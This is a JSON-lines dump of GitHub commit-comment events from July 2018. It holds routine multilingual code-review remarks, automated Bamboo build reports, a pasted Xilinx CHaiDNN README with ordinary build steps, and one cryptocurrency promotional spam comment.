{"id":"8008517444","type":"CommitCommentEvent","actor":{"login":"ca333"},"repo":{"name":"KomodoPlatform/KomodoPlatform"},"payload":{"comment":{"id":29810511,"position":null,"line":null,"path":null,"commit_id":"2ec4e39124f7932f1d119acc3057b33b346087d2","created_at":"2018-07-24T08:08:40Z","updated_at":"2018-07-24T08:08:40Z","author_association":"NONE","body":"fixed missing semicolon from zilla merge and added missing rfox as well\r\n@himu007 please ACK for jl777 merge"}},"created_at":"2018-07-24T08:08:40Z"}
{"id":"8008520093","type":"CommitCommentEvent","actor":{"login":"Simps0n"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29810515,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T08:09:15Z","updated_at":"2018-07-24T08:09:15Z","author_association":"NONE","body":"Great :). Watching it closely"}},"created_at":"2018-07-24T08:09:15Z"}
{"id":"8008521211","type":"CommitCommentEvent","actor":{"login":"Piiit"},"repo":{"name":"idm-suedtirol/bdp-core"},"payload":{"comment":{"id":29810516,"position":87,"line":112,"path":"ws-interface/src/main/java/it/bz/idm/bdp/ws/RestController.java","commit_id":"2d1246ab8ca7f2937c9f34fb2b44e460492436b8","created_at":"2018-07-24T08:09:30Z","updated_at":"2018-07-24T08:09:30Z","author_association":"CONTRIBUTOR","body":"`@ApiParam(STATION_PARAM, required=true)` needed, since ApiParam overwrites all annotations"}},"created_at":"2018-07-24T08:09:30Z"}
{"id":"8008525734","type":"CommitCommentEvent","actor":{"login":"Doc1337"},"repo":{"name":"SS13-SCP13/SS13-SCP13"},"payload":{"comment":{"id":29810522,"position":null,"line":null,"path":null,"commit_id":"eaa08c2ac3c0993201f186080cd397c168baabc2","created_at":"2018-07-24T08:10:25Z","updated_at":"2018-07-24T08:10:25Z","author_association":"NONE","body":"brilliant"}},"created_at":"2018-07-24T08:10:25Z"}
{"id":"8008526275","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29810523,"position":42,"line":39,"path":"part2/right_triangle.rb","commit_id":"2a09ccbe90a888ffb6ff4edd0e5424ad47174cf6","created_at":"2018-07-24T08:10:31Z","updated_at":"2018-07-24T08:10:31Z","author_association":"NONE","body":"Точно! Я попался) Но получается нужно помнить все, что было мутированно в программе до сих пор. Я бы предпочел видеть, сравнение 2 сторон. Это больше отражает \"намерение\" кода. Ведь мы хотим проверить, что 2 катета равны, а не уникальны "}},"created_at":"2018-07-24T08:10:31Z"}
{"id":"8008536681","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29810532,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-24T08:12:35Z","updated_at":"2018-07-24T08:12:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T08:12:35Z"}
{"id":"8008537572","type":"CommitCommentEvent","actor":{"login":"dzerbino"},"repo":{"name":"Ensembl/postgap"},"payload":{"comment":{"id":29810534,"position":null,"line":null,"path":null,"commit_id":"05031e95e276a6ddeff2669c5b5eec1ea207ff12","created_at":"2018-07-24T08:12:46Z","updated_at":"2018-07-24T08:12:46Z","author_association":"MEMBER","body":"Hello @jcmarca , next time, could you please break up your commits to address only one issue or bug at a time? Understanding this commit requires thinking about two modifications in parallel. "}},"created_at":"2018-07-24T08:12:46Z"}
{"id":"8008537965","type":"CommitCommentEvent","actor":{"login":"hokamnikhil"},"repo":{"name":"hokamnikhil/Angular-Rating"},"payload":{"comment":{"id":29810535,"position":null,"line":null,"path":null,"commit_id":"e17c34da282c40b49a279ae7401649153e65452c","created_at":"2018-07-24T08:12:51Z","updated_at":"2018-07-24T08:12:51Z","author_association":"OWNER","body":"Add reference function setColor for rating"}},"created_at":"2018-07-24T08:12:51Z"}
{"id":"8008538821","type":"CommitCommentEvent","actor":{"login":"phoebusryan"},"repo":{"name":"FriendsOfREDAXO/redactor2"},"payload":{"comment":{"id":29810537,"position":null,"line":null,"path":null,"commit_id":"92f02ef75b27731db603dd6d91bd5731ebe13f93","created_at":"2018-07-24T08:13:01Z","updated_at":"2018-07-24T08:13:01Z","author_association":"MEMBER","body":"Eben nicht. Die Cachedatei ist sprachabhängig mittlerweile. "}},"created_at":"2018-07-24T08:13:01Z"}
{"id":"8008539294","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29810538,"position":71,"line":173,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"f19ee011c000de16f120f530f62977a0f58496e0","created_at":"2018-07-24T08:13:08Z","updated_at":"2018-07-24T08:13:08Z","author_association":"CONTRIBUTOR","body":"Das bewegt das Objekt das heißt die Zahlen sind relativ zur derzeitigen position...\r\n\r\nalso `[5,5].move([0,1]) -> ergibt [5,6]`\r\n\r\num die Position zurück zu setzen müsste man folgendes machen:\r\n```\r\n  object.rect[0] = object.start_pos[0]\r\n  object.rect[1] = object.start_pos[1]\r\n```"}},"created_at":"2018-07-24T08:13:08Z"}
{"id":"8008540427","type":"CommitCommentEvent","actor":{"login":"AmyBSOD"},"repo":{"name":"NullCGT/SpliceHack"},"payload":{"comment":{"id":29810539,"position":null,"line":null,"path":null,"commit_id":"4376e4f09e5fd53b65575d3f78286fc51109dde0","created_at":"2018-07-24T08:13:22Z","updated_at":"2018-07-24T08:13:22Z","author_association":"NONE","body":"pline(\"BANG\");\r\n\r\nis that a debug line?"}},"created_at":"2018-07-24T08:13:22Z"}
{"id":"8008543114","type":"CommitCommentEvent","actor":{"login":"gtrias"},"repo":{"name":"alvarium/switchboard-operator"},"payload":{"comment":{"id":29810541,"position":13,"line":1,"path":"app.ts","commit_id":"855b18986a0b5230bf5cde9649f03492f7bf098f","created_at":"2018-07-24T08:13:57Z","updated_at":"2018-07-24T08:13:57Z","author_association":"MEMBER","body":"@elboletaire is not a typo. The import require format is supported in typescript. https://stackoverflow.com/questions/35706164/typescript-import-as-vs-import-require"}},"created_at":"2018-07-24T08:13:57Z"}
{"id":"8008544118","type":"CommitCommentEvent","actor":{"login":"dzerbino"},"repo":{"name":"Ensembl/postgap"},"payload":{"comment":{"id":29810542,"position":31,"line":397,"path":"POSTGAP.py","commit_id":"05031e95e276a6ddeff2669c5b5eec1ea207ff12","created_at":"2018-07-24T08:14:10Z","updated_at":"2018-07-24T08:14:10Z","author_association":"MEMBER","body":"Hello again, this all looks correct, but the MAFs hash also contains gnomad subpopulations, such as gnomad_sas, gnomad_oth, etc. Could you please catch those?"}},"created_at":"2018-07-24T08:14:10Z"}
{"id":"8008547422","type":"CommitCommentEvent","actor":{"login":"phoebusryan"},"repo":{"name":"FriendsOfREDAXO/redactor2"},"payload":{"comment":{"id":29810551,"position":null,"line":null,"path":null,"commit_id":"92f02ef75b27731db603dd6d91bd5731ebe13f93","created_at":"2018-07-24T08:14:50Z","updated_at":"2018-07-24T08:14:50Z","author_association":"MEMBER","body":"Siehe https://github.com/FriendsOfREDAXO/redactor2/blob/master/boot.php#L35"}},"created_at":"2018-07-24T08:14:50Z"}
{"id":"8008547546","type":"CommitCommentEvent","actor":{"login":"mesqueeb"},"repo":{"name":"TrustWallet/trust-wallet-ios"},"payload":{"comment":{"id":29810552,"position":null,"line":null,"path":null,"commit_id":"a3b7d9305ca6ce812529f118047d645873a8f78f","created_at":"2018-07-24T08:14:52Z","updated_at":"2018-07-24T08:14:52Z","author_association":"NONE","body":"When will this change be pushed to the iOS app. We'd want to change our payment app on the same day this iOS update becomes live.\r\n\r\nThank you very much."}},"created_at":"2018-07-24T08:14:52Z"}
{"id":"8008552209","type":"CommitCommentEvent","actor":{"login":"enaut"},"repo":{"name":"Hideakiii/School-Tasks"},"payload":{"comment":{"id":29810560,"position":56,"line":131,"path":"Avalonion_v4/Avalonion_v6.py","commit_id":"f19ee011c000de16f120f530f62977a0f58496e0","created_at":"2018-07-24T08:15:47Z","updated_at":"2018-07-24T08:15:47Z","author_association":"CONTRIBUTOR","body":"Hier funktioniert das nur, weil die Objekte am Anfang in der Position [0,0] sind siehe auch weiter unten.\r\nIch würde dieses Setzen der Startposition im __init__ von Obeject machen. Das ist eigentlich dafür zuständig die Objektdaten zu initialisieren."}},"created_at":"2018-07-24T08:15:47Z"}
{"id":"8008552451","type":"CommitCommentEvent","actor":{"login":"issmirnov"},"repo":{"name":"jhoonb/archivex"},"payload":{"comment":{"id":29810561,"position":null,"line":null,"path":null,"commit_id":"1eb6e91aa0b4b9b1623fdf3a2a38142b4afe4b63","created_at":"2018-07-24T08:15:50Z","updated_at":"2018-07-24T08:15:50Z","author_association":"NONE","body":"@claudiodangelis, This is the likely cause of claudiodangelis/qr-filetransfer#70"}},"created_at":"2018-07-24T08:15:50Z"}
{"id":"8008552462","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29810562,"position":null,"line":null,"path":null,"commit_id":"f2525ce958afcdc5357ddf93fa8ce8b1b012321c","created_at":"2018-07-24T08:15:51Z","updated_at":"2018-07-24T08:15:51Z","author_association":"OWNER","body":"not as profitable we test"}},"created_at":"2018-07-24T08:15:51Z"}
{"id":"8008554434","type":"CommitCommentEvent","actor":{"login":"gtrias"},"repo":{"name":"alvarium/switchboard-operator"},"payload":{"comment":{"id":29810566,"position":13,"line":1,"path":"app.ts","commit_id":"855b18986a0b5230bf5cde9649f03492f7bf098f","created_at":"2018-07-24T08:16:15Z","updated_at":"2018-07-24T08:16:15Z","author_association":"MEMBER","body":"[Here](https://www.typescriptlang.org/docs/handbook/modules.html) you can check the official explanation:\r\n\r\n> When exporting a module using export =, TypeScript-specific import module = require(\"module\") must be used to import the module."}},"created_at":"2018-07-24T08:16:15Z"}
{"id":"8008556771","type":"CommitCommentEvent","actor":{"login":"AlexSytUa"},"repo":{"name":"AlexSytUa/Study"},"payload":{"comment":{"id":29810570,"position":19,"line":19,"path":"Lesson2/purchases_sum.rb","commit_id":"5a68ec6f8685cb404d490890d26b72bb0428ee0a","created_at":"2018-07-24T08:16:44Z","updated_at":"2018-07-24T08:16:44Z","author_association":"OWNER","body":"Понял) Спасибо большое)"}},"created_at":"2018-07-24T08:16:44Z"}
{"id":"8008564013","type":"CommitCommentEvent","actor":{"login":"dzerbino"},"repo":{"name":"Ensembl/postgap"},"payload":{"comment":{"id":29810578,"position":15,"line":300,"path":"POSTGAP.py","commit_id":"05031e95e276a6ddeff2669c5b5eec1ea207ff12","created_at":"2018-07-24T08:18:12Z","updated_at":"2018-07-24T08:18:12Z","author_association":"MEMBER","body":"The tissue names without context without context may not be meaningful to the reader of the file. \r\n\r\nI would recommend that you replace:\r\n```[tissue_name for tissue_name in postgap.Globals.ALL_TISSUES]```\r\n\r\nwith\r\n```[\"GTEx_\" + tissue_name for tissue_name in postgap.Globals.ALL_TISSUES]```"}},"created_at":"2018-07-24T08:18:12Z"}
{"id":"8008565557","type":"CommitCommentEvent","actor":{"login":"azdanov"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29810579,"position":null,"line":null,"path":null,"commit_id":"71a1d9e5586ddd6475e4abf356c49852a0a9407a","created_at":"2018-07-24T08:18:32Z","updated_at":"2018-07-24T08:18:32Z","author_association":"COLLABORATOR","body":"Need a test to make sure something similar doesn't happen.\r\n\r\nOriginal integration test is checking the built script, but not published."}},"created_at":"2018-07-24T08:18:32Z"}
{"id":"8008567614","type":"CommitCommentEvent","actor":{"login":"Die-Trompie"},"repo":{"name":"MyEtherWallet/ethereum-lists"},"payload":{"comment":{"id":29810581,"position":null,"line":null,"path":null,"commit_id":"da9451f50b643716bf36afcdeeac854db262f832","created_at":"2018-07-24T08:18:56Z","updated_at":"2018-07-24T08:18:56Z","author_association":"NONE","body":"[IOST: 400X ETH & 100X EOS] #IOST, backed by Sequoia Cap China & 30+ institutions investors, is already 400X faster than Ethereum and 100X more decentralized than EOS. Join the #IOST Community Hub & claim up to 100,000+ IOST https://hub.iost.io/register?inviteCode=r1lalXBNEQ&lang=en"}},"created_at":"2018-07-24T08:18:56Z"}
{"id":"8008575873","type":"CommitCommentEvent","actor":{"login":"KeyJoo"},"repo":{"name":"KeyJoo/GoldenLinks"},"payload":{"comment":{"id":29810587,"position":null,"line":null,"path":null,"commit_id":"91fa191eeb09af28617bb8a253a703e023daa629","created_at":"2018-07-24T08:20:35Z","updated_at":"2018-07-24T08:20:35Z","author_association":"OWNER","body":"**Visual Studio Code** in Preview mode has no errors in both tables. \r\nTables pushed on https://github.com  was broken. In next commit it was fixed."}},"created_at":"2018-07-24T08:20:35Z"}
{"id":"8008576158","type":"CommitCommentEvent","actor":{"login":"nerdalertdk"},"repo":{"name":"laravel/cashier"},"payload":{"comment":{"id":29810588,"position":null,"line":null,"path":null,"commit_id":"1e87a60f1bf5c8981730d2481350f74fccaf0947","created_at":"2018-07-24T08:20:39Z","updated_at":"2018-07-24T08:20:39Z","author_association":"NONE","body":"When will this be released  ?"}},"created_at":"2018-07-24T08:20:39Z"}
{"id":"8008577997","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29810591,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-24T08:21:01Z","updated_at":"2018-07-24T08:21:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T08:21:01Z"}
{"id":"8008578295","type":"CommitCommentEvent","actor":{"login":"ArjunDandagi"},"repo":{"name":"anubc777/30days-of-code2"},"payload":{"comment":{"id":29810592,"position":20,"line":20,"path":"Recursion.java","commit_id":"77aa72bab052a52db1e0c372f37ced9f38c2874b","created_at":"2018-07-24T08:21:04Z","updated_at":"2018-07-24T08:21:04Z","author_association":"NONE","body":"Hi, \r\nRecursion means , calling the same function inside its body something like\r\n\r\nfun callme()\r\n{\r\ncallme()\r\n}\r\nbut there will be a base case when the function returns the final primitive value / object and the program ends \r\n\r\nmore here -  https://www.geeksforgeeks.org/recursion/\r\n"}},"created_at":"2018-07-24T08:21:04Z"}
{"id":"8008580115","type":"CommitCommentEvent","actor":{"login":"jindaxia"},"repo":{"name":"zhangn1985/ykdl"},"payload":{"comment":{"id":29810593,"position":null,"line":null,"path":null,"commit_id":"68711756290980b78d63cbd9ff7e3e8a5457d504","created_at":"2018-07-24T08:21:27Z","updated_at":"2018-07-24T08:21:27Z","author_association":"COLLABORATOR","body":"这个能 resolve #246 么?"}},"created_at":"2018-07-24T08:21:27Z"}
{"id":"8008586110","type":"CommitCommentEvent","actor":{"login":"2271704092"},"repo":{"name":"2271704092/25"},"payload":{"comment":{"id":29810599,"position":2,"line":2,"path":"README.md","commit_id":"feb255a594705af5b283824a35f6d408143c982f","created_at":"2018-07-24T08:22:35Z","updated_at":"2018-07-24T08:22:35Z","author_association":"OWNER","body":"# **CHaiDNN**\r\n\r\nThe CHaiDNN is Xilinx Deep Neural Network library for acceleration of deep neural networks on Xilinx Ultrascale MPSoCs. It is designed for maximum compute efficiency at 16-bit integer data type.\r\n\r\nThe design goal of CHaiDNN is to achieve best accuracy with maximum performance. The inference on CHaiDNN works in fixed point domain for better performance. All the feature maps and trained parameters are converted from single precision to fixed point based on the precison parameters specified by the user. The precision parameters can vary a lot depending upon the network, datasets, or even across layers in the same network. Accuracy of a network depends on the precision parameters used to represent the feature maps and trained parameters. Well-crafted precision parameters are expected to give accuracy similar to accuracy obtained\r\nfrom a single precision model. \r\n\r\n## **How to Download the Repository**\r\n\r\nTo get a local copy of the CHaiDNN repository, clone this repository to the local system with the following command:\r\n``` sh\r\ngit clone https://github.com/Xilinx/CHaiDNN.git CHaiDNN\r\n```\r\nWhere `CHaiDNN` is the name of the directory where the repository will be stored on the local system. This command needs to be executed only once to retrieve the latest version of the CHaiDNN library.\r\n\r\n## **Hardware and Software Requirements**\r\n\r\nThe CHaiDNN library is designed to work with Zynq Ultrascale+ MPSoCs. The library has been verified on zcu102 board. Xilinx [SDSoC 2017.4 Development Environment](https://www.xilinx.com/support/download/index.html/content/xilinx/en/downloadNav/sdx-development-environments.html) is required to work with the library.\r\n\r\n## **Run Inference Using Pre-built binaries**\r\n\r\nFollow the below steps to run inference on example networks.\r\n\r\n1. Download the example networks that need to to be benchmarked and place the unzipped contents at `SD_Card/models` directory.\r\n\t* [AlexNet](https://www.xilinx.com/content/dam/xilinx/open-source/AlexNet.zip)\r\n\t* [GoogleNet](https://www.xilinx.com/content/dam/xilinx/open-source/GoogleNet.zip)\r\n\t* [AlexNetFCN](https://www.xilinx.com/content/dam/xilinx/open-source/AlexNetFCN.zip)\r\n\t* [SSD](https://www.xilinx.com/content/dam/xilinx/open-source/SSD.zip)\r\n\t* [VGG-16](https://www.xilinx.com/content/dam/xilinx/open-source/vgg16.zip)\r\n\t* [Advanced ResNet50](https://www.xilinx.com/content/dam/xilinx/open-source/AdvResnet50.zip)\r\n2. Verify the contents of `SD_Card` with the below checklist.\r\n\t* `_sds` folder\r\n\t* `models` folder\r\n\t* `lib` folder\r\n\t* `opencv_arm64` folder\r\n\t* `protobuf_arm64` folder\r\n\t* `BOOT.BIN` file\r\n\t* `image.ub` file\r\n\t* `.elf` file(s)\r\n\r\n3. Copy the contents of `SD_Card` folder into a SD-Card.\r\n4. Insert the SD-Card and power on the board.\r\n\r\n> **Note:** A serial port emulator (Teraterm/Minicom) is required to interface the user commands to the board\r\n\r\n5. Attach a USB-UART cable from the ZCU102 board to the host PC. Set the UART serial port to\r\n\t```\r\n\tBaud rate: 115200\r\n\tData: 8 bit\r\n\tParity: none\r\n\tStop: 1 bit\r\n\tFlow control: none\r\n\t```\r\n\r\n6. After boot, go to `/mnt` directory.\r\n\r\n\t``` sh\r\n\tcd /mnt\r\n\t```\r\n\r\n7. Export library paths.\r\n\t```\tsh\r\n\texport LD_LIBRARY_PATH=lib/:opencv_arm64/lib/:protobuf_arm64/lib\r\n\t```\r\n\r\n8. Execute the commands to run inference for the networks \r\n\r\n-  AlexNet\t\r\n\t```\r\n\t./alexnet.elf\r\n\t```\r\n- GoogleNet\r\n\t```\r\n\t./googlenet.elf\r\n\t```\r\n\r\n- VGG16\r\n\t```   \r\n\t./vgg.elf\r\n\t```\r\n- AlexNetFCN\r\n\t```\r\n\t./alexnetfcn.elf\r\n\t```\r\n- SSD\r\n\t```\r\n\t./ssd.elf\r\n\t```\t\r\n- Advanced ResNet50\r\n\t```\r\n\t./adv_resnet50.elf\r\n\t```\t\r\n9. Sync after execution\r\n\t``` sh\r\n\tcd /\r\n\tsync\r\n\tumount /mnt\r\n\t```\t\r\n10.\tOutput will be written into text file inside respective output folders.\r\n\t```\t\r\n\tEx : models/<network>/out\r\n\t```\r\n\r\n**Note:** Failing to run `sync` might corrupt the file system and cause crash on subsequent runs.\r\n\r\n**Note:** For running inference on a new network, please follow the instructions in [Run new Network using CHaiDNN](./RUN_NEW_NETWORK.md).\r\n\r\n## **Build from Source**\r\n\r\nCHaiDNN can be built using Makefiles OR using SDx IDE. The below steps describe how to build CHaiDNN using Makefiles. For steps to build using SDx IDE, check the instructions in [Build using SDx IDE](./BUILD_USING_SDX_GUI.md). \r\n\r\n## 1. Build CHaiDNN Hardware from source\r\nPlease follow the steps to build the design for zcu102\r\n\r\n1. \tGo to the local `CHaiDNN` folder.\r\n\r\n2. \tGo to `design` directory. This contains all the design files required to build the design.\r\n\r\n3. \tGo to `scripts/kernel` directory. This contains the Makefile to compile the design.\r\n\r\n4. \tSource the SDx-2017.4 path. Please check the example command below.\r\n\r\n- For BASH:\r\n\t```sh\r\n\tsource <SDx Installation Dir>/installs/lin64/SDx/2017.4/settings64.sh\r\n\t```\r\n- For CSH\r\n\t```sh\r\n\tsource <SDx Installation Dir>/installs/lin64/SDx/2017.4/settings64.csh\r\n\t```\r\n\t\r\n5.\tRun Makefile. This will build the design.\r\n\t```sh\r\n\tmake ultraclean\r\n\tmake\r\n\t```\t\r\n6.\tAfter the build is completed, copy the `libxlnxdnn.so` file and other build files (`BOOT.BIN`, `image.ub` and `_sds` directory) inside `scripts/kernel/sd_card` to `SD_Card` directory.\r\n\t```sh\r\n\tmake copy\r\n\t```\r\n8. The hardware setup is now ready. \r\n\r\n## 2. Build CHaiDNN Software from source\r\n\r\nFollow the steps to compile the software stack.\r\n\r\n1. Copy `libxlnxdnn.so` to `SD_Card/lib` directory. This will be present inside `design/scripts/kernel/sd_card` directory once the HW build is finished.\r\n\r\n\t> Skip this step if already copied.\r\n\r\n2. Source SDx path.   \r\n* CSH\r\n\t```sh\r\n\tsource <SDx Installation Dir>/installs/lin64/SDx/2017.4/settings64.csh\r\n\t```     \r\n* BASH\r\n\t```sh\r\n\tsource <SDx Installation Dir>/installs/lin64/SDx/2017.4/settings64.sh\r\n\t```\r\n\r\n3. Go to the `software` directory. This contains all the files to generate software libraries (.so).    \r\n\t```sh\r\n\tcd <path to CHaiDNN>/software\r\n\t```\r\n\r\n4. Go to `scripts` directory, open `Makefile` and update the `SDx_BUILD_PATH` variable. Check example below.\r\n\t```\r\n\tSDx_BUILD_PATH = <SDx Installation Dir>/installs/lin64/SDx/2017.4\r\n\t``` \r\n\r\n5. Now run the following commands.\r\n\r\n\t```sh\r\n\tcd scripts\r\n\tmake ultraclean\r\n\tmake\r\n\t```\r\n\r\n6. Make will copy all executables to `SD_Card` directory and all `.so` files to `SD_Card/lib` directory.\r\n\r\n7. Now all the files are available to run inference on zcu102. \r\n\r\n- Download the example models and copy the unzipped contents to `SD_Card/models` folder.\r\n- Copy the contents of `SD_Card` directory to SD-Card\r\n\r\n8. Insert the SD-Card in the board card slot and switch it ON.\r\n\r\n9. Upon successful boot, execute the following commands.    \r\n\t```sh\r\n\tcd /mnt\r\n\texport LD_LIBRARY_PATH=opencv_arm64/lib/:lib/:protobuf_arm64/lib/ \r\n\t./<name>.elf \r\n\t```\r\n\r\n10. Make sure to sync before removing SD-Card from the board OR power off the board. \r\n\t```sh\r\n\tcd /\r\n\tsync\r\n\tumount /mnt\r\n\t```\r\n\t\r\n## **CHaiDNN-2017.4 Performance**\r\n\r\nNetwork | Images/ Second @ 200 MHz (Batch Size =1 on zcu102)\r\n--------|-----------------------------------------\r\nGoogleNet| 72.97\r\nAlexNet(with FC)| 55.11\r\nAlexNet(without FC)| 160.03\r\nVGG-16| 9.68\r\nAlexNet-FCN| 7.59\r\nSSD | 4.64\r\n[AdvResNet](https://arxiv.org/abs/1603.05027)| 21.18\r\n[ResNet50](https://arxiv.org/abs/1512.03385)| 24.59\r\n[ResNet34](https://arxiv.org/abs/1512.03385)| 37.68\r\n\r\n\r\n**IMP : Only Performance Projections for Legacy *ResNet34* and *ResNet50*.** \r\n\r\n## **CHaiDNN-2017.4 Resource Utilization**\r\n\r\nParameter | Available on zcu102 | Used | % Utilization\r\n----------|---------------------|------|--------------\r\nDSP | 2520 | 1939 | 76.94\r\nBRAM | 912 | 828.5 | 90.84\r\nLUT | 274080 | 135033 | 49.27\r\nFF | 548160 | 176146 | 32.13\r\n\r\n## **Other Information**\r\n\r\nFor CHaiDNN API Document click [CHaiDNN API document](./API_DOCUMENT.md)\r\n\r\nFor Running Inference on other Networks [Running Inference for new networks](./RUN_NEW_NETWORK.md).\r\n\r\nFor information on CHaiDNN quantization parameters check [Quantization Parameters User Guide](./QUANTIZATION_PARAMETERS_UG.md)\r\n\r\nFor insturctions on creating the SDx GUI Project for CHaiDNN click [Build using SDx IDE](./BUILD_USING_SDX_GUI.md)\r\n\r\nFor SDSoC User Guide click [SDSoC User Guides](https://www.xilinx.com/support/documentation/sw_manuals/xilinx2017_4/ug1027-sdsoc-user-guide.pdf)\r\n\r\n## **Important Notes**\r\n* none\r\n\r\n## **Support**\r\n\r\nFor questions and to get help on this project or your own projects, visit the [SDSoC Forums](https://forums.xilinx.com/t5/SDSoC-Development-Environment/bd-p/sdsoc).\r\n\r\n## **Licence and Contributing to the Repository**\r\nThe source for this project is licensed under the [Apache License 2.0](./LICENSE)\r\n\r\nTo contribute to this project, follow the guidelines in the [Repository Contribution README](./CONTRIBUTING.md)\r\n\r\n## **Acknowledgements**\r\n\r\n- [Xilinx Inc.](http://www.xilinx.com)\r\n- [Caffe | Berkeley Vision and Learning Center](http://caffe.berkeleyvision.org/)\r\n- [Protocol Buffers | Google](https://developers.google.com/protocol-buffers/)\r\n\r\n## **Revision History**\r\n\r\nDate      | Readme Version | Release Notes\t\t\t| Tool Version\r\n----------|----------------|------------------------|-------------\r\nFeb, 2018 | 1.0            | Initial Xilinx release | SDx-2017.4\r\n\r\n## **Change Log**\r\n\r\n1. First Release\r\n\r\n## **Known Issues**\r\n* none\r\n"}},"created_at":"2018-07-24T08:22:35Z"}
{"id":"8008587081","type":"CommitCommentEvent","actor":{"login":"Joozty"},"repo":{"name":"smi2/phpClickHouse"},"payload":{"comment":{"id":29810604,"position":25,"line":200,"path":"README.md","commit_id":"9c577dd82d2b4c7950fe1b1159b7c5ce1358dea7","created_at":"2018-07-24T08:22:45Z","updated_at":"2018-07-24T08:22:45Z","author_association":"NONE","body":"@isublimity Are you sure with this? This hasn't been fixed. The output should be `blabla.com/urls:8765` because port is neither false, null, or empty. "}},"created_at":"2018-07-24T08:22:45Z"}
{"id":"8008622838","type":"CommitCommentEvent","actor":{"login":"SeaHOH"},"repo":{"name":"zhangn1985/ykdl"},"payload":{"comment":{"id":29810650,"position":null,"line":null,"path":null,"commit_id":"68711756290980b78d63cbd9ff7e3e8a5457d504","created_at":"2018-07-24T08:29:26Z","updated_at":"2018-07-24T08:29:26Z","author_association":"COLLABORATOR","body":"不清楚，有条件的可以自己测试。"}},"created_at":"2018-07-24T08:29:26Z"}
{"id":"8008626083","type":"CommitCommentEvent","actor":{"login":"MarkNaumenko"},"repo":{"name":"KarneyenkaDzmitry/bellagio.com"},"payload":{"comment":{"id":29810657,"position":10,"line":19,"path":"page-objects/restaurants.page.js","commit_id":"8ef3fca2b09b0f3322bb128a00c924d9548bacc4","created_at":"2018-07-24T08:30:04Z","updated_at":"2018-07-24T08:30:04Z","author_association":"NONE","body":"element is undefined on this line"}},"created_at":"2018-07-24T08:30:04Z"}
{"id":"8008626618","type":"CommitCommentEvent","actor":{"login":"grishka"},"repo":{"name":"grishka/libtgvoip"},"payload":{"comment":{"id":29810659,"position":null,"line":null,"path":null,"commit_id":"5380aaba0db661c4a21306817d1bbd46bec52fef","created_at":"2018-07-24T08:30:10Z","updated_at":"2018-07-24T08:30:10Z","author_association":"OWNER","body":"@ignatenkobrain it's all subjective."}},"created_at":"2018-07-24T08:30:10Z"}
{"id":"8008635377","type":"CommitCommentEvent","actor":{"login":"bfchengnuo"},"repo":{"name":"bfchengnuo/MyRecord"},"payload":{"comment":{"id":29810704,"position":null,"line":null,"path":null,"commit_id":"2f3cd5439ed85b5f4c24d29d38f498529dd4e893","created_at":"2018-07-24T08:31:49Z","updated_at":"2018-07-24T08:31:49Z","author_association":"OWNER","body":"tableSizeFor 扩容机制也是 1.8 加入的，在 1.7 的源码中没有找到"}},"created_at":"2018-07-24T08:31:49Z"}
{"id":"8008635796","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29810713,"position":44,"line":44,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/route.rb","commit_id":"be917a850a791abbdc4b9d0a3b87273425f0e297","created_at":"2018-07-24T08:31:54Z","updated_at":"2018-07-24T08:31:54Z","author_association":"OWNER","body":"No eto proverka ne rabotaet okz...ne zametil on ved ne yavlyaetsa tipom classa Station( a ya napryamuyu pytayus privyazat tip STRING chto i vyvodit oshybku...izmenil ispravil na tip Station"}},"created_at":"2018-07-24T08:31:54Z"}
